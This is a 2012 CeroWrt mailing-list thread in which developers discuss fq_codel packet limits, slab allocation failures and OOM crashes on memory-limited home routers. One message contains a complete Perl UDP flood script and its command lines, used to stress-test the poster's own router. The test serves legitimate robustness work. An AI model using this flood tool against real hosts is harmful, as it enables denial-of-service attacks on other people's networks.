Re: [Cerowrt-devel] Coping with router memory limitations in fq_codel

Sebastian Moeller Mon, 20 Aug 2012 12:55:35 -0700

Hi Dave,

sorry for accidentally taking this private, so here it is again.



On Aug 20, 2012, at 12:41 PM, Sebastian Moeller wrote:

> Hi Dave,
> 
> thanks for the long and thoughtful response.
> 
> 
> On Aug 20, 2012, at 12:12 PM, Dave Taht wrote:
> 
>> Dear Sebastian:
>> 
>> In addition to your udp flooding DoS attack, I attacked cero also by
>> using diffserv marking in netperf (-Y codepoint,codepoint) to saturate
>> all 4 wifi fq_codel queues, and also would get the router to have
>> memory allocation failures and ultimately crash in the same way you
>> are crashing it. I can similarly do what you just did with rtp
>> flooding. You are correct that codel is tuned for tcp, and that
>> fq_codel by maintaining many queues is even more susceptible to a
>> tuned udp flooding attack on a memory limited device such as this.
> 
>       Ah, I did not think that I reported something new in regards to crash 
> the router, it was more about me having found a way to reproduce it without 
> netsurf/iperf (which I never really got to run, due to a lack of endpoints) 
> as well as without using http://broadband.mpi-sws.org/residential/ (as this 
> only allows around 5 runs per 24hour period).
> 
>> 
>> I tried to cope with this in 3.3.8-10/11 by reducing the packet
>> limits, which helped a lot. Unfortunately the settings I used then
>> were below codel's reaction time, which invoked "interesting" tail
>> drop behavior, so I arbitrarily doubled them in -17. To invoke more of
>> the kind of problems you are encountering…
> 
>       That would be limit 600? Is 600 a problem for a single flow, or die to 
> limit being for the sum of all flows? Would an additional per flow limit be 
> able to help deal with this issue?
> 
>> 
>> 0) Since then I have been looking into ways to improve codel's
>> reaction time that are in the ns2 model presently, also fixing an
>> assumption about newton's method that didn't hold in reverse, and also
>> means to incorporate more aggressive codel behavior when queue limits
>> are near to being exceeded.
> 
>       I see ramping up the drop frequency once space gets tight...
> 
>> 
>> Unfortunately as the memory pressure problem starts in the driver,
>> it's not communicated up the stack to where it could be controlled
>> better…
> 
>       Argh, sounds like fun :)
> 
>> 
>> 0) I would like avoid having to determining if a queue is tcp or
>> "other", and then having different kinds of drop strategies for each.
>> That said, it seems possible to implement that…
> 
>       Since the flows are filled by hash, a flow might contain both, correct? 
> So being more firm in non-tcp containg flows, might hurt some TCP in shared 
> bins.
> 
>> 
>> 1) A workaround of sorts for the 64MB 3700v2 has been to give up on
>> named and get some memory back that way.
> 
>       Since I am a layman, what is the quick and dirty (and reversible) way 
> to do so, so I can test this?
> 
>> 
>> 2) I believe, but am not sure, that Linux 3.6(5?) has some stuff in it
>> to get skb memory allocations done more efficiently. Eric and I and
>> felix had talked about it, I don't know what was implemented.
> 
>       ISTR there was something about fixing the accounting of drivers so they 
> track all buffers and not just part of the payload (truesize was the word). 
> Which totally went over my head, but sounds like something that might help...
> 
>> 
>> 3) It may be possible to improve how the memory allocations from the
>> 2048 slab work in general. I imagine that half of memory is being
>> wasted on big packets otherwise.
> 
>       I had a quick look at the SLUB documentation and see no way to do so I 
> can understand.
> 
>> 
>> 4) some options for improving fq_codel for more memory constrained
>> home environments better.
>> 
>> 4a) On the wifi front (as well as other devices with multiple hardware
>> queues), I envision something like "mfq_codel", which would have an
>> overall similar packet limit to a single fq_codel, but be able to
>> deliver (and fair queue) packets to the underlying hardware queues
>> independently.
> 
>       Sounds like something to test I guess (but out of my league)
> 
>> 
>> 4b) On the home to-ISP gateway qos front, a rate limited (tbf)
>> mfq_codel with 2-4 queues would replace the complexity of hfsc or htb
>> with a default qdisc that "just worked" without any scripting. It
>> could be mildly more responsive (htb buffers up some data and has it's
>> own notion of time and quantums), thus cpu and memory usage would be
>> lower than htb + multiple fq_codel queues.
> 
>       But I thought that being able to arbitrarily prioritize some traffic in 
> a home router is a good thing; and that will require some hierarchical system 
> and will bring along some complexity...
> 
> 
>> 
>> Getting something that scaled down to 10s of kbits and up to gigabits
>> would be hard, tho. HTB needs to be tuned when running lower or higher
>> than it's original operating range, presently, and that is where, in
>> part, the simple_qos.sh effort is "stuck".
> 
>       Can't this not be divined from the configured up and downlink rates? Or 
> are you thinking about dynamic changes in link-rates?
> 
>> 
>> 4c) Another thought would be to have a weighted packet (to handle
>> classification) oriented sfq codel or qfq_codel rather than separate
>> fq_codel queues that are each byte-aware... we have CPU to burn, but
>> not memory…
> 
>       That I admit I do not understand.
> 
> Thanks a lot & best regards
>       Sebastian
> 
>> 
>> On Mon, Aug 20, 2012 at 11:24 AM, Sebastian Moeller <moell...@gmx.de> wrote:
>>> Hi Dave,
>>> 
>>> so I went to play around with this a bit more. I turned to UDP flooding my 
>>> cable modem through the router and this surely allows me to create enough 
>>> load on the wndr3700v2 to cause the allocation errors and as a "bonus" also 
>>> to drive the router to reboot (driven by the watchdog timer?). Here is the 
>>> script I used over 5G wireless (from 
>>> http://blog.ioshints.info/2008/03/udp-flood-in-perl.html)
>>> 
>>> #!/usr/bin/perl
>> 
>> It would be nice to have a C or lua version of this sort of test.
>> 
>>> ##############
>>> 
>>> # udp flood.
>>> ##############
>>> 
>>> use Socket;
>>> use strict;
>>> 
>>> if ($#ARGV != 3) {
>>> print "flood.pl <ip> <port> <size> <time>\n\n";
>>> print " port=0: use random ports\n";
>>> print " size=0: use random size between 64 and 1024\n";
>>> print " time=0: continuous flood\n";
>>> exit(1);
>>> }
>>> 
>>> my ($ip,$port,$size,$time) = @ARGV;
>>> 
>>> my ($iaddr,$endtime,$psize,$pport);
>>> 
>>> $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
>>> $endtime = time() + ($time ? $time : 1000000);
>>> 
>>> socket(flood, PF_INET, SOCK_DGRAM, 17);
>>> 
>>> 
>>> print "Flooding $ip " . ($port ? $port : "random") . " port with " .
>>> ($size ? "$size-byte" : "random size") . " packets" .
>>> ($time ? " for $time seconds" : "") . "\n";
>>> print "Break with Ctrl-C\n" unless $time;
>>> 
>>> for (;time() <= $endtime;) {
>>> $psize = $size ? $size : int(rand(1024-64)+64) ;
>>> $pport = $port ? $port : int(rand(65500))+1;
>>> 
>>> send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
>>> 
>>> called as either
>>> udp_flood.pl 192.168.100.1 0 1024 240
>>> or
>>> udp_flood.pl 192.168.100.1 32000 1024 240
>>> 
>>> The first version with randomized port number spreads the load nicely over 
>>> many fq_codel bins/flows and seems slightly more likely to cause allocation 
>>> errors and reboots than the 2nd invocation which restricts itself to port 
>>> 32000 and presumably just one flow.
>>>       I wonder how to make cerowrt survive this kind of stress test…
>>> 
>>> best
>>>       Sebastian
>>> 
>>> 
>>> On Aug 15, 2012, at 9:08 PM, Dave Taht wrote:
>>> 
>>>> re: ath: skbuff alloc of size 1926 failed
>>>> 
>>>> as for the ath skbuff problem, I've seen that a lot. I had put hard
>>>> packet limits (~600) on fq_codel in -11 and prior that were too low
>>>> and it mostly went away, but I hit tail drop behavior everywhere,
>>>> instead of codel behavior. What I have now (typically 1200) may well
>>>> be too high, but not as overly high as the default (10k packets).
>>>> There may be another means of increasing the size of that slab pool or
>>>> making it less onerous.
>>>> 
>>>> I would like it if codel "kicked in" earlier than it currently does.
>>>> The code in ns2 is currently using half the period that the linux code
>>>> is. This would control things better, or so I hope (planning on trying
>>>> this as I get time)
>>>> 
>>>> I am also considering means of artificially upscaling the drop
>>>> scheduler when we get close to queue limits.
>>>> 
>>>> See some discussions on the codel list for these issues. (sims are
>>>> easier to deal with than cerowrt, too!)
>>>> 
>>>> as for bind, it should be automagically restarted from xinetd, no need
>>>> to fiddle with anything. However, since you are already under massive
>>>> memory pressure, it may well fail to start up that way, too. At the
>>>> moment, I've largely given up on bind on anything but a more core home
>>>> gw, and am running dnsmasq on everything (3700v2, picostations,
>>>> nanostations) but the 3800s. (and the ones I run it on, aren't being
>>>> used for wifi right now).
>>>> 
>>>> Lastly: Swap space won't help you on exhausting kernel limits.
>>>> 
>>>> I'm glad you can reproduce the ath: slab problem - I can get it too at
>>>> high rates using netperf over wifi. I will try a 3700v2 with and
>>>> without bind to see if it's still there in 3.3.8-17. In the meantime
>>>> if anyone knows how to get more allocations in that (2048? 4096?) slab
>>>> by default, perhaps that will help?
>>>> 
>>>> 
>>>> 
>>>> On Wed, Aug 15, 2012 at 10:23 AM, Sebastian Moeller <moell...@gmx.de> 
>>>> wrote:
>>>>> Hi Dave,
>>>>> 
>>>>> great work, as always I upgraded my production router to the latest and 
>>>>> greatest (since I only have one router…). And it works quite well for 
>>>>> normal usage…
>>>>> Netalyzr reports around 2800ms seconds of uplink buffering, yet 
>>>>> saturating the uplink does not affect ping times to a remote target 
>>>>> noticeably, basically the same as for all codellized ceo versions I 
>>>>> tested so far...
>>>>> 
>>>>> Some notes and a question:
>>>>> I noticed that even given plenty of swap space (1GB on a usb stick), 
>>>>> using http://broadband.mpi-sws.org/residential/ to exercise UDP stress 
>>>>> (on the uplink I assume) I can easily produce (I run the test from a 
>>>>> macosx via 5GHz wireless over 1.5 yards):
>>>>> Aug 15 01:16:29 nacktmulle kern.err kernel: [175395.132812] ath: skbuff 
>>>>> alloc of size 1926 failed
>>>>> (and plenty of those…).
>>>>> What then happens is that the OOM killer will aim for bind (reasonable 
>>>>> since it is the largest single process) and kill it. When I try to 
>>>>> restart bind by:
>>>>> root@nacktmulle:~# /etc/rc.d/S47namedprep start
>>>>> root@nacktmulle:~# /etc/rc.d/S48named restart
>>>>> Stopping isc-bind
>>>>> /etc/chroot/named//var/run/named/named.pid not found, trying brute force
>>>>> killall: named: no process killed
>>>>> Kicking isc-bind in xinetd
>>>>> rndc: connect failed: 127.0.0.1#953: connection refused
>>>>> And bind does not start again and the router becomes less than useful. 
>>>>> Now I assume I am doing something wrong, but what, if you have any idea 
>>>>> how to solve this short of a reboot of the router (my current method) I 
>>>>> would be happy to learn
>>>>> 
>>>>> 
>>>>> 
>>>>> best regards
>>>>>      sebastian
>>>>> 
>>>>> On Aug 12, 2012, at 11:08 PM, Dave Taht wrote:
>>>>> 
>>>>>> I'm too tired to write up a full set of release notes, but I've been
>>>>>> testing it all day,
>>>>>> and it looks better than -10 and certainly better than -11, but I won't 
>>>>>> know
>>>>>> until some more folk sit down and test it, so here it is.
>>>>>> 
>>>>>> http://huchra.bufferbloat.net/~cero1/3.3/3.3.8-17/
>>>>>> 
>>>>>> fresh merge with openwrt, fix to a bind CVE, fixes for 6in4 and quagga
>>>>>> routing problems,
>>>>>> and a few tweaks to fq_codel setup that might make voip better.
>>>>>> 
>>>>>> Go forth and break things!
>>>>>> 
>>>>>> In other news:
>>>>>> 
>>>>>> Van Jacobson gave a great talk about bufferbloat, BQL, codel, and 
>>>>>> fq_codel
>>>>>> at last week's ietf meeting. Well worth watching. At the end he outlines
>>>>>> the deployment problems in particular.
>>>>>> 
>>>>>> http://recordings.conf.meetecho.com/Recordings/watch.jsp?recording=IETF84_TSVAREA&chapter=part_3
>>>>>> 
>>>>>> Far more interesting than this email!
>>>>>> 
>>>>>> 
>>>>>> --
>>>>>> Dave Täht
>>>>>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out
>>>>>> with fq_codel!"
>>>>>> _______________________________________________
>>>>>> Cerowrt-devel mailing list
>>>>>> Cerowrt-devel@lists.bufferbloat.net
>>>>>> https://lists.bufferbloat.net/listinfo/cerowrt-devel
>>>>> 
>>>> 
>>>> 
>>>> 
>>>> --
>>>> Dave Täht
>>>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out
>>>> with fq_codel!"
>>> 
>> 
>> 
>> 
>> -- 
>> Dave Täht
>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out
>> with fq_codel!"
> 

_______________________________________________
Cerowrt-devel mailing list
Cerowrt-devel@lists.bufferbloat.net
https://lists.bufferbloat.net/listinfo/cerowrt-devel

Re: [Cerowrt-devel] Coping with router memory limitations in fq_codel

Reply via email to